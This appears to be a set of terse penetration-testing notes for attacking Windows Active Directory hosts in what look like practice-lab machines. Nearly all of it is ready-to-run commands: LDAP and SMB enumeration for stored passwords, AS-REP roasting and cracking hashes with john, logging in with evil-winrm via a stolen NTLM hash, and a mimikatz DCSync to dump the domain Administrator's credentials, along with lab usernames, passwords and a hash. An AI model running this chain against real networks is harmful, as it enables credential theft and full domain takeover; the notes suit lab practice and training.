Windows Enumeration

To search for desktop shortcut link's with "runas/savecred"

> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt
> ForEach ( $file in gc .\shortcuts.txt) { Write-Output $file ; gc $file | Select-String runas }

389/tcp open ldap Microsoft Windows Active Directory LDAP

nmap -p 389 --script ldap-rootdse -Pn 10.10.10.182

nmap -p 389 --script ldap-search -Pn 10.10.10.182

ldapsearch -x -h 10.10.10.182

ldapsearch -x -h 10.10.10.182 -x -s base nameingcontexts

ldapsearch -x -h 10.10.10.182 -x -b 'dc=cascade,dc=local' 



ldapsearch -x -h 10.10.10.182 -s sub -b 'dc=cascade,dc=local' 

---[grep out put for LegacyPwd, pwd, ]

smbclient -L \\\\10.10.10.x

smbclient \\\\10.10.10.182\\Data -U <user> <password>

smb: \> recurse                                                                                                
smb: \> ls


smb: \> recurse on
smb: \> prompt off
smb: \> mget

anonymous

cme smb 10.10.10.182 -u r.thompson -p rY4n5eva

cme smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares

get hashes of useres

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.175

carck the hash with john

john -wordlist= /usr/share/wordlists/rockyou.txt hash.txt

ruby evil-winrm.rb -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!



Hash NTLM: d9485863c1e9e05851aa40cbb4ab9dff

ruby evil-winrm.rb -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff

./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"